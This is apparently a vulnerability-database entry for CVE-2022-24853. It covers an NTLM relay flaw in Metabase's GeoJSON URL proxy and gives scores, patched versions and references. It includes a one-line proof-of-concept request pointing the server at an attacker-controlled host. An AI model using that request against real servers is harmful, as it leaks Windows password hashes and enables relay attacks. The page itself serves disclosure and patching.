CVE-2022-24853

Published: 14/04/2022 Updated: 22/04/2022

CVSS v2 Base Score: 2.6 | Impact Score: 2.9 | Exploitability Score: 4.9

CVSS v3 Base Score: 5.3 | Impact Score: 3.6 | Exploitability Score: 1.6

VMScore: 231

Vector: AV:N/AC:H/Au:N/C:P/I:N/A:N

Metabase is an open source business intelligence and analytics application. Metabase has a proxy to load arbitrary URLs for JSON maps as part of our GeoJSON support. While we do validation to not return contents of arbitrary URLs, there is a case where a particularly crafted request could result in file access on windows, which allows enabling an `NTLM relay attack`, potentially allowing an malicious user to receive the system password hash. If you use Windows and are on this version of Metabase, please upgrade immediately. The following patches (or greater versions) are available: 0.42.4 and 1.42.4, 0.41.7 and 1.41.7, 0.40.8 and 1.40.8.

Vulnerable Product	Search on Vulmon	Subscribe to Product
metabase metabase

Metabase NTLM Attack

CVE-2022-24853 Metabase NTLM Reflection / Relay Attack CVE-2022-24853 Blog Post about the finding: secure77de/metabase-ntlm-relay-attack/ Github Security Advisory: githubcom/metabase/metabase/security/advisories/GHSA-5cfq-582c-c38m POC metabase-target-servercom/api/geojson?url=jar:file:\<attacker-ip>\testtxt!/

CWE-200 CWE-200 https://www.qomplx.com/qomplx-knowledge-ntlm-relay-attacks-explained/https://github.com/metabase/metabase/security/advisories/GHSA-5cfq-582c-c38m https://secure77.de/metabase-ntlm-relay-attack/https://nvd.nist.gov https://github.com/secure-77/CVE-2022-24853

Get Started

Vulmon Search is a vulnerability search engine. It gives comprehensive vulnerability information through a very simple user interface.

Home Recent Vulnerabilities Research Posts Trends Blog About Contact

Vulmon Search Vulmon Research Vulmon Alerts Vulmap

Twitter Reddit Linkedin Facebook

CVE-2022-24853

Vulnerability Summary

Vulnerability Trend

Github Repositories

References

Vulmon Search

About

Products

Connect